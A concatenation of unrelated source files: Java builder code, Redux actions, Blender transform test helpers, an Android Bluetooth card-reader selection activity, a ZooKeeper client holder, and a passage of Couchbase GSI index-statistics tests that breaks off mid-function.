        public Builder setMarketingNames(List<String> marketingNames) {
            this.deviceInstance.setMarketingNames(marketingNames);
            return this;
        } // setMarketingNames()

        public Device build() {
            return this.deviceInstance;
        } // build()
    } // Builder
} // Device
|
MichaelC23/Headlines
|
src/feed/redux/actions.js
|
<gh_stars>0
/**
* Feed actions.
* @module src/feed/redux/actions
*/
import {
UPDATE_FEED,
SET_CATEGORY,
SET_LOADING,
FETCH_FEED,
} from 'src/feed/constants';
/**
 * Update feed action.
 * @function updateFeed
 * @param {Object} body raw JSON feed payload.
 * @returns {Object} UPDATE_FEED action carrying the payload.
 */
export function updateFeed(body) {
  return {
    type: UPDATE_FEED,
    body,
  };
}
/**
 * Request a feed fetch.
 * @function fetchFeed
 * @param {Boolean} loading whether the feed is (or should be) loading.
 * @returns {Object} FETCH_FEED action with the loading flag in its body.
 */
export function fetchFeed(loading) {
  return {
    type: FETCH_FEED,
    body: {
      loading,
    },
  };
}
/**
 * Set the feed category.
 * @function setCategory
 * @param {String} category the category name.
 * @returns {Object} SET_CATEGORY action with the category in its body.
 */
export function setCategory(category) {
  const body = { category };
  return { type: SET_CATEGORY, body };
}
/**
 * Set the loading flag.
 * @function setLoading
 * @param {Boolean} loading the new loading state.
 * @returns {Object} SET_LOADING action with the flag in its body.
 */
export function setLoading(loading) {
  return {
    type: SET_LOADING,
    body: {
      loading,
    },
  };
}
|
ZtModArchive/blender_niftools_addon
|
testframework/integration/modules/object/b_gen_object.py
|
<gh_stars>10-100
"""Helper functions to create and test Blender scene geometry data"""
# ***** BEGIN LICENSE BLOCK *****
#
# Copyright © 2005, NIF File Format Library and Tools contributors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the NIF File Format Library and Tools
# project nor the names of its contributors may be used to endorse
# or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# ***** END LICENSE BLOCK *****
import bpy
from math import radians, degrees
import mathutils
import nose
# Tolerance used for approximate float comparisons in the checks below.
EPSILON = 0.005
# Per-axis tolerance vector for comparing mathutils Vectors.
E_VEC = mathutils.Vector((EPSILON, EPSILON, EPSILON))
ZERO = mathutils.Vector((0.0, 0.0, 0.0))
# Canonical test rotation angles, in radians.
RAD_30 = radians(30.0)
RAD_60 = radians(60.0)
RAD_90 = radians(90.0)
def b_create_transformed_object(b_name):
    """Create an empty object named b_name and apply the standard test
    transform (translation, rotation, scale); return the object."""
    new_obj = b_create_empty_object(b_name)
    b_apply_transform_object(new_obj)
    return new_obj
def b_create_empty_object(b_name):
    """Creates empty object named b_name and returns it."""
    # bpy.ops.object.add makes the new empty the active object.
    bpy.ops.object.add(type='EMPTY')
    b_obj = bpy.data.objects[bpy.context.active_object.name]
    b_obj.name = b_name
    return b_obj
def b_apply_transform_object(b_obj):
    """Applies the canonical test scaling, rotation and translation to
    b_obj's user-level transform channels."""
    b_obj.rotation_euler = b_rot_mat().to_euler()
    b_obj.location = b_translation_mat().to_translation()
    b_obj.scale = b_scale_mat().to_scale()
def b_translation_mat():
    """Return the canonical test translation matrix: (20, 20, 20)."""
    return mathutils.Matrix.Translation((20, 20, 20))
def b_scale_mat():
    """Return a uniform 0.75 scale matrix (second arg is matrix size 4)."""
    return mathutils.Matrix.Scale(0.75, 4)
def b_rot_mat():
    """Return a non-trivial rotation matrix: 30 deg about X, then 60 deg
    about Y, then 90 deg about Z (composed right-to-left)."""
    b_rot_mat_x = mathutils.Matrix.Rotation(RAD_30, 4, 'X')
    b_rot_mat_y = mathutils.Matrix.Rotation(RAD_60, 4, 'Y')
    b_rot_mat_z = mathutils.Matrix.Rotation(RAD_90, 4, 'Z')
    # Blender 2.80+ removed Matrix * Matrix multiplication; the file's
    # f-strings already require Python 3.6+ (i.e. Blender 2.8x), so use '@'.
    return b_rot_mat_z @ b_rot_mat_y @ b_rot_mat_x
def b_check_transform(b_obj):
    """Verify both the composed local matrix and the user-level channels."""
    b_check_matrix_local(b_obj)
    b_check_user_transforms(b_obj)
def b_check_user_transforms(b_obj):
    """Assert that b_obj's user-level transform channels (location,
    scale, rotation_euler) match the canonical test transform within
    tolerance.

    BUG FIX: each print() previously had its closing parenthesis inside
    the f-string literal, leaving the call unclosed (a SyntaxError).
    """
    print(f"b_obj.location - {b_obj.location}")
    nose.tools.assert_equal(b_obj.location, b_translation_mat().to_translation())  # location
    print(f"b_obj.scale - {b_obj.scale}")
    nose.tools.assert_equal((b_obj.scale - b_scale_mat().to_scale()) < E_VEC, True)  # uniform scale
    b_rot_eul = b_obj.rotation_euler
    print(f"b_rot_eul - {b_rot_eul}")
    b_rot_axis = (degrees(b_rot_eul.x), degrees(b_rot_eul.y), degrees(b_rot_eul.z))
    print(f"b_rot_eul(x,y,z) - {b_rot_axis}")
    nose.tools.assert_equal((b_rot_eul.x - RAD_30) < EPSILON, True)  # x rotation
    nose.tools.assert_equal((b_rot_eul.y - RAD_60) < EPSILON, True)  # y rotation
    nose.tools.assert_equal((b_rot_eul.z - RAD_90) < EPSILON, True)  # z rotation
def b_check_matrix_local(b_obj):
    """Assert that the decomposition of b_obj.matrix_local matches the
    canonical test translation, scale and rotation within tolerance.

    BUG FIX: each print() previously had its closing parenthesis inside
    the f-string literal, leaving the call unclosed (a SyntaxError).
    """
    b_loc_vec, b_rot_quat, b_scale_vec = b_obj.matrix_local.decompose()  # transforms
    print(f"b_loc_vec - {b_loc_vec}")
    nose.tools.assert_equal(b_loc_vec, b_translation_mat().to_translation())  # location
    print(f"b_scale_vec - {b_scale_vec}")
    nose.tools.assert_equal((b_scale_vec - b_scale_mat().to_scale()) < E_VEC, True)  # uniform scale
    b_rot_eul = b_rot_quat.to_euler()
    print(f"b_rot_eul - {b_rot_eul}")
    b_rot_axis = (degrees(b_rot_eul.x), degrees(b_rot_eul.y), degrees(b_rot_eul.z))
    print(f"b_rot_eul(x,y,z) - {b_rot_axis}")
    nose.tools.assert_equal((b_rot_eul.x - RAD_30) < EPSILON, True)  # x rotation
    nose.tools.assert_equal((b_rot_eul.y - RAD_60) < EPSILON, True)  # y rotation
    nose.tools.assert_equal((b_rot_eul.z - RAD_90) < EPSILON, True)  # z rotation
|
REINER-Kartengeraete/REINER_SCT_Bluetooth_LE_Android
|
reiner_ccid_via_dk_sample/app/src/main/java/userinterface/BluetoothReaderSelection.java
|
<filename>reiner_ccid_via_dk_sample/app/src/main/java/userinterface/BluetoothReaderSelection.java
/*
*
*
*
* Created by <NAME> on 5.5.2015.
* Copyright (c) 2015 REINER SCT. All rights reserved.
*
* Version: 0.5.3
* Date: 17.02.2017
* Autor: <NAME>
* eMail: <EMAIL>
*/
package userinterface;
import java.util.List;
import java.util.Set;
import secode3.SecoderBluetoothReader;
import secode3.SecoderReaderCallbacks;
import secodeInfo.SecoderInfoData;
import utilitis.*;
import bluetooth.BluetoothConnectionState;
import bluetooth.BluetoothErrors;
import bluetooth.Bluetooth_ReaderInfo;
import com.example.reiner_ccid_via_dk_sample.R;
import android.app.Activity;
import android.app.AlertDialog;
import android.bluetooth.BluetoothDevice;
import android.bluetooth.BluetoothManager;
import android.content.Context;
import android.content.DialogInterface;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.preference.PreferenceManager;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.AdapterView;
import android.widget.AdapterView.OnItemClickListener;
import android.widget.Button;
import android.widget.ListView;
import android.widget.ProgressBar;
import android.widget.TextView;
// TODO: Auto-generated Javadoc
/**
* The Class BluetoothReaderSelection.
*/
public class BluetoothReaderSelection extends Activity {

    /** Bluetooth service used to scan for, and bond with, card readers. */
    private SecoderBluetoothReader _bluetoothService;

    /** List of devices discovered by the current scan. */
    private ListView foundDevices;

    /** List of devices already bonded in the Android Bluetooth settings. */
    private ListView knownDevices;

    /** Starts a reader scan. */
    private Button scanButton;

    /** Progress indicator shown while scanning. */
    private ProgressBar spinner;

    /** Adapter shared by both list views (recreated on each refresh). */
    private BluetoothReaderInfoAdapter mArrayAdapter;

    /** Readers found by the current scan. */
    private SetList<Bluetooth_ReaderInfo> foundreaders = new SetList<Bluetooth_ReaderInfo>();

    /** Readers already bonded with this phone. */
    private SetList<Bluetooth_ReaderInfo> knownreaders = new SetList<Bluetooth_ReaderInfo>();

    /**
     * Position (in foundreaders) of the device chosen for bonding.
     * NOTE(review): name is misspelled ("Posittion"); rename in a follow-up.
     */
    private int devicetoBondPosittion = 0;

    /** Shows the currently selected default reader. */
    private TextView usedReaderTextView;

    /* (non-Javadoc)
     * @see android.app.Activity#onCreate(android.os.Bundle)
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.reader_selection);
        foundDevices = (ListView) findViewById(R.id.listViewFoundDevices);
        knownDevices = (ListView) findViewById(R.id.listViewKnownDevices);
        scanButton = (Button) findViewById(R.id.scanButton);
        spinner = (ProgressBar) findViewById(R.id.spinnerProgress);
        spinner.setVisibility(View.INVISIBLE);
        usedReaderTextView = (TextView) findViewById(R.id.textViewUsedReader);
        //foundreaders.add(new Bluetooth_ReaderInfo());
        knownreaders.add(new Bluetooth_ReaderInfo());
        updateKnownReaders();
        scanButton.setOnClickListener(listener);
        // Disabled until the service reports initiated() via the callbacks.
        scanButton.setEnabled(false);
        LoadDefaultReader();
        initBluetoothReader();
    }

    /** Starts a reader scan when the scan button is clicked. */
    OnClickListener listener = new OnClickListener() {

        @Override
        public void onClick(View v) {
            spinner.setVisibility(View.VISIBLE);
            // NOTE(review): 9999999 is a magic timeout (presumably ms —
            // confirm unit); consider extracting a named constant.
            _bluetoothService.scanReaders(9999999);
        }
    };

    /**
     * Inits the bluetooth reader service with this activity's callbacks.
     */
    private void initBluetoothReader() {
        _bluetoothService = new SecoderBluetoothReader(secoderCallbacks,
                getApplicationContext());
    }

    /**
     * Load bonded bluetooth devices from the system adapter into
     * knownreaders, adding a placeholder entry when none are bonded.
     */
    private void LoadBondedBluetoothDevices() {
        knownreaders.clear();
        final BluetoothManager bluetoothManager = (BluetoothManager) getSystemService(Context.BLUETOOTH_SERVICE);
        Set<BluetoothDevice> pairedDevices = null;
        pairedDevices = bluetoothManager.getAdapter().getBondedDevices();
        // If there are paired devices
        if (pairedDevices.size() > 0) {
            // Loop through paired devices
            for (BluetoothDevice device : pairedDevices) {
                knownreaders.add(new Bluetooth_ReaderInfo(device.getName(), device.getAddress(), true));
            }
        }
        // Placeholder so the list view is never empty.
        if (knownreaders.size() <= 0)
            knownreaders.add(new Bluetooth_ReaderInfo());
    }

    /**
     * Update known readers list view from the bonded-device set.
     */
    private synchronized void updateKnownReaders() {
        LoadBondedBluetoothDevices();
        mArrayAdapter = new BluetoothReaderInfoAdapter(this, knownreaders);
        knownDevices.setAdapter(mArrayAdapter);
        knownDevices.setOnItemClickListener(tableClickListener2);
    }

    /**
     * Update found readers list view from the scan results.
     */
    private synchronized void updateFoundReaders() {
        if(mArrayAdapter != null) mArrayAdapter.clear();
        mArrayAdapter = new BluetoothReaderInfoAdapter(this, foundreaders);
        foundDevices.setAdapter(mArrayAdapter);
        foundDevices.setOnItemClickListener(tableClickListener);
    }

    /** Click on a FOUND device: remember it, then bond (stopping a running
     * scan first; bonding continues in onScanningFinished()). */
    private OnItemClickListener tableClickListener = new OnItemClickListener() {

        @Override
        public void onItemClick(AdapterView<?> parent, View view, int position,long id) {
            if (parent == foundDevices) {
                devicetoBondPosittion = position;
                if(_bluetoothService.getBluetoothConnectionState() == BluetoothConnectionState.Scanning){
                    _bluetoothService.stopScaning();
                }
                else
                {
                    startBonding();
                }
            }
        }
    };

    /** Click on a KNOWN device: make it the default reader. */
    private OnItemClickListener tableClickListener2 = new OnItemClickListener() {

        @Override
        public void onItemClick(AdapterView<?> parent, View view, int position,long id) {
            if (parent == knownDevices) {
                Bluetooth_ReaderInfo reader = knownreaders.get(position);
                saveDefaultReader(reader);
            }
        }
    };

    /**
     * Start bonding with the previously selected found reader.
     */
    private synchronized void startBonding()
    {
        Bluetooth_ReaderInfo reader = foundreaders.get(devicetoBondPosittion);
        _bluetoothService.bondReader(reader.getReaderID());
    }

    /**
     * Persist the given reader as the default in shared preferences and
     * reflect it in the UI.
     *
     * @param info the reader to save
     */
    private void saveDefaultReader(Bluetooth_ReaderInfo info) {
        usedReaderTextView.setText("Used Reader:" + info.getReaderName());
        SharedPreferences preferences = PreferenceManager
                .getDefaultSharedPreferences(this);
        SharedPreferences.Editor preferencesEditor = preferences.edit();
        preferencesEditor.putString("RSCTActiveBluetoothDeviceName",
                info.getReaderName());
        preferencesEditor.putString("RSCTActiveBluetoothDeviceId",
                info.getReaderID());
        // NOTE(review): commit() writes synchronously on the calling thread;
        // apply() is the recommended asynchronous alternative here.
        preferencesEditor.commit();
    }

    /**
     * Load the default reader from shared preferences and show it in the UI.
     *
     * @return the stored reader info (name defaults to "no reader found")
     */
    private Bluetooth_ReaderInfo LoadDefaultReader() {
        Bluetooth_ReaderInfo info = new Bluetooth_ReaderInfo();
        SharedPreferences preferences = PreferenceManager.getDefaultSharedPreferences(this);
        info.setReaderName(preferences.getString("RSCTActiveBluetoothDeviceName", "no reader found"));
        info.setReaderID(preferences.getString("RSCTActiveBluetoothDeviceId",""));
        usedReaderTextView.setText("Used Reader:" + info.getReaderName());
        return info;
    }

    /**
     * Load the default reader from shared preferences (static variant used
     * by other components; does not touch this activity's UI).
     *
     * @param ctx context used to reach the shared preferences
     * @return the stored reader info
     */
    public static Bluetooth_ReaderInfo LoadDefaultReader(Context ctx) {
        Bluetooth_ReaderInfo info = new Bluetooth_ReaderInfo();
        SharedPreferences preferences = PreferenceManager.getDefaultSharedPreferences(ctx);
        info.setReaderName(preferences.getString("RSCTActiveBluetoothDeviceName", "no reader found"));
        info.setReaderID(preferences.getString("RSCTActiveBluetoothDeviceId",""));
        return info;
    }

    /**
     * Show a confirmation dialog for the selected reader; finishes the
     * activity when the user confirms.
     *
     * @param info the selected reader
     */
    private void showDeviceSelectedDialog( Bluetooth_ReaderInfo info)
    {
        try {
            AlertDialog.Builder builder = null;
            builder = new AlertDialog.Builder(this);
            builder.setMessage("You selected the Device "+ info.getReaderName() + ".\nMake Sure the device is Bond in the Android bluetooth menu!").setTitle("Choosen Reader");
            builder.setPositiveButton("OK",new DialogInterface.OnClickListener() {

                @Override
                public void onClick(DialogInterface dialog, int which) {
                    finish();
                }
            });
            AlertDialog dialog = builder.create();
            dialog.show();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /** Callbacks from the reader service; only scan/bond/init events are
     * handled here, APDU/data callbacks are intentionally no-ops. */
    private SecoderReaderCallbacks secoderCallbacks = new SecoderReaderCallbacks() {

        @Override
        public void didRecieveApdu(String answer) {
        }

        @Override
        public void didRecieveSecoderInfo(SecoderInfoData info) {
        }

        @Override
        public void didRecieveResponseError(BluetoothErrors errorMessage,
                String respCode) {
        }

        @Override
        public void didFindReaders(List<Bluetooth_ReaderInfo> devices) {
            foundreaders.addAll(devices);
            updateFoundReaders();
        }

        @Override
        public void onScanningFinished() {
            spinner.setVisibility(View.INVISIBLE);
            // A pending selection (tableClickListener) bonds once the scan stops.
            startBonding();
        }

        @Override
        public void disconnected() {
            // TODO Auto-generated method stub
        }

        @Override
        public void initiated() {
            scanButton.setEnabled(true);
        }

        @Override
        public void Bonded(Bluetooth_ReaderInfo info) {
            saveDefaultReader(info);
            showDeviceSelectedDialog(info);
        }

        @Override
        public void readyToSend() {
            // TODO Auto-generated method stub
        }
    };
}
|
tienthanh108/thanhnt
|
src/routes/News/containers/News.js
|
<reponame>tienthanh108/thanhnt
import { connect } from 'react-redux'
import News from '../components/News'
// No state is mapped yet; the component relies on its own props/state.
export const mapStateToProps = () => ({
})

// No action creators bound yet.
export const mapDispatchToProps = {
}

export default connect(mapStateToProps, mapDispatchToProps)(News)
|
fantasticmao/grpc-java-kit
|
grpc-kit-kernel/src/main/java/cn/fantasticmao/grpckit/nameresolver/zookeeper/ZkClientHolder.java
|
package cn.fantasticmao.grpckit.nameresolver.zookeeper;
import org.apache.curator.framework.CuratorFramework;
import org.apache.curator.framework.CuratorFrameworkFactory;
import org.apache.curator.framework.imps.CuratorFrameworkState;
import org.apache.curator.retry.ExponentialBackoffRetry;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.concurrent.ConcurrentHashMap;
/**
* Hold connections to the ZooKeeper server.
*
* @author fantasticmao
* @version 1.39.0
* @see <a href="https://zookeeper.apache.org/">Apache ZooKeeper</a>
* @since 2022-03-22
*/
class ZkClientHolder {

    private static final Logger LOGGER = LoggerFactory.getLogger(ZkClientHolder.class);

    /** Root ZNode namespace under which all paths are created. */
    private static final String PATH_ROOT = "grpc-java";

    /** One started client per distinct connect string. */
    private static final ConcurrentHashMap<String, CuratorFramework> CLIENT_CACHE = new ConcurrentHashMap<>();

    /**
     * Get (creating and starting on first use) the shared client for the
     * given ZooKeeper connect string.
     *
     * @param connectString ZooKeeper connect string, e.g. "host:2181"
     * @return a started {@link CuratorFramework} client
     */
    public static CuratorFramework get(String connectString) {
        // computeIfAbsent is atomic per key, replacing the original
        // double-checked locking on the class monitor; the mapping
        // function runs at most once per connect string.
        return CLIENT_CACHE.computeIfAbsent(connectString, key -> {
            CuratorFramework client = CuratorFrameworkFactory.builder()
                .namespace(PATH_ROOT)
                .connectString(key)
                .retryPolicy(new ExponentialBackoffRetry(5_000, 3))
                .sessionTimeoutMs(15_000)
                .build();
            client.start();
            return client;
        });
    }

    static {
        // Close every cached, still-running connection on JVM shutdown.
        Runtime.getRuntime().addShutdownHook(new Thread(() ->
            CLIENT_CACHE.forEach((connectString, client) -> {
                if (CuratorFrameworkState.STARTED == client.getState()) {
                    LOGGER.debug("Close ZooKeeper connection for connection string: {}", connectString);
                    client.close();
                }
            })
        ));
    }
}
|
couchbaselabs/testrunner-bharath
|
pytests/gsi/index_config_stats_gsi.py
|
<reponame>couchbaselabs/testrunner-bharath
from .base_gsi import BaseSecondaryIndexingTests
from remote.remote_util import RemoteMachineShellConnection
from membase.api.rest_client import RestConnection, RestHelper
from pytests.query_tests_helper import QueryHelperTests
import time
class SecondaryIndexingStatsConfigTests(BaseSecondaryIndexingTests, QueryHelperTests):
    def setUp(self):
        """Per-test setup: run base GSI setup, then read the test's
        flush_bucket/move_index input parameters (both default False)."""
        super(SecondaryIndexingStatsConfigTests, self).setUp()
        self.flush_bucket = self.input.param('flush_bucket', False)
        self.move_index = self.input.param('move_index', False)
    def suite_setUp(self):
        # Intentionally empty: all setup happens per-test in setUp().
        pass
    def tearDown(self):
        # Delegate cleanup entirely to the base GSI teardown.
        super(SecondaryIndexingStatsConfigTests, self).tearDown()
    def suite_tearDown(self):
        # Intentionally empty: all cleanup happens per-test in tearDown().
        pass
    def test_key_size_distribution(self):
        """Verify the indexer's key-size distribution stats across the
        documented size buckets, and that the stats survive an indexer
        restart (stats persistence)."""
        index_node = self.get_nodes_from_services_map(service_type="index",
                                                      get_all_nodes=False)
        rest = RestConnection(index_node)
        # Persist index stats every 60s so they survive the kill below.
        doc = {"indexer.statsPersistenceInterval": 60}
        rest.set_index_settings_internal(doc)
        # One value per key-size bucket: (65-256), (257-1024),
        # (1025-4096), (4097-102400), (102401-max).
        string_70 = "x" * 70
        string_260 = "x" * 260
        string_1030 = "x" * 1030
        string_5000 = "x" * 5000
        string_103000 = "x" * 103000
        insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
        insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : "%s" })' % string_260
        insert_query3 = 'INSERT INTO default (KEY, VALUE) VALUES ("id3", { "name" : "%s" })' % string_1030
        insert_query4 = 'INSERT INTO default (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
        insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
        self.n1ql_helper.run_cbq_query(query=insert_query1,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query2,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query3,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query4,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query5,
                                       server=self.n1ql_node)
        # Second bucket gets a single mid-sized key for contrast.
        insert_query1 = 'INSERT INTO standard_bucket0 (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
        self.n1ql_helper.run_cbq_query(query=insert_query1,
                                       server=self.n1ql_node)
        create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
        create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI"
        create_index_query3 = "CREATE INDEX idx ON standard_bucket0(name) USING GSI"
        create_index_query4 = "CREATE INDEX idx2 ON standard_bucket0(join_mo) USING GSI"
        try:
            self.n1ql_helper.run_cbq_query(query=create_index_query1,
                                           server=self.n1ql_node)
            self.n1ql_helper.run_cbq_query(query=create_index_query2,
                                           server=self.n1ql_node)
            self.n1ql_helper.run_cbq_query(query=create_index_query3,
                                           server=self.n1ql_node)
            self.n1ql_helper.run_cbq_query(query=create_index_query4,
                                           server=self.n1ql_node)
        except Exception as ex:
            self.log.info(str(ex))
            # NOTE(review): message says "did not fail with expected error"
            # but index creation is expected to SUCCEED here — confirm wording.
            self.fail(
                "index creation did not fail with expected error : {0}".format(
                    str(ex)))
        expected_distr = []
        expected_distr2 = []
        # The 2016 count in (0-64) presumably comes from the standard test
        # dataset loaded by base setUp — TODO confirm.
        common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
        expected_distr.append("{u'(0-64)': 2016, u'(257-1024)': 1, u'(65-256)': 1, u'(4097-102400)': 1, u'(1025-4096)': 1, u'(102401-max)': 1}")
        expected_distr.append(common_distr)
        expected_distr2.append("{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 1, u'(1025-4096)': 0, u'(102401-max)': 0}")
        expected_distr2.append(common_distr)
        index_map = self.get_index_stats()
        self.log.info(index_map)
        self.verify_key_size(index_map, 'default', expected_distr)
        self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
        # Wait one persistence interval so stats reach disk before the kill.
        self.sleep(60)
        shell = RemoteMachineShellConnection(index_node)
        # Output/error are currently unused; the kill's effect is checked below.
        output1, error1 = shell.execute_command("killall -9 indexer")
        self.sleep(30)
        # Stats must be unchanged after the indexer restarts.
        index_map = self.get_index_stats()
        self.log.info(index_map)
        self.verify_key_size(index_map, 'default', expected_distr)
        self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
def test_key_size_distribution_nulls(self):
string_70 = "x" * 70
string_103000 = "x" * 103000
insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : NULL })'
insert_query3 = 'INSERT INTO default (KEY, VALUE) VALUES ("id3", { "name" : ""})'
insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query5,
server=self.n1ql_node)
create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
expected_distr = []
common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr.append("{u'(0-64)': 2018, u'(257-1024)': 0, u'(65-256)': 1, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 1}")
expected_distr.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
def test_key_size_distribution_objects(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
string_70 = "x" * 70
string_3000 = "x" * 3000
string_103000 = "x" * 103000
insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : {"name": "%s", "fake": "%s"} })' % (string_70, string_3000)
insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query5,
server=self.n1ql_node)
create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
expected_distr = []
common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr.append("{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 1, u'(4097-102400)': 0, u'(1025-4096)': 1, u'(102401-max)': 1}")
expected_distr.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
if self.flush_bucket:
rest.flush_bucket("default")
self.sleep(30)
insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : {"name": "%s", "fake": "%s"} })' % (
string_70, string_3000)
insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query5,
server=self.n1ql_node)
expected_distr = []
common_distr = "{u'(0-64)': 0, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr.append(
"{u'(0-64)': 0, u'(257-1024)': 0, u'(65-256)': 1, u'(4097-102400)': 0, u'(1025-4096)': 1, u'(102401-max)': 1}")
expected_distr.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
def test_key_size_distribution_dml(self):
create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
string_103000 = "x" * 103000
update_query = "UPDATE default SET name = '%s' WHERE name = 'employee-9'" % string_103000
self.n1ql_helper.run_cbq_query(query=update_query,
server=self.n1ql_node)
expected_distr = []
common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr.append("{u'(0-64)': 2000, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 16}")
expected_distr.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
delete_query = "delete from default where name = 'employee-6'"
self.n1ql_helper.run_cbq_query(query=delete_query,
server=self.n1ql_node)
expected_distr2 = []
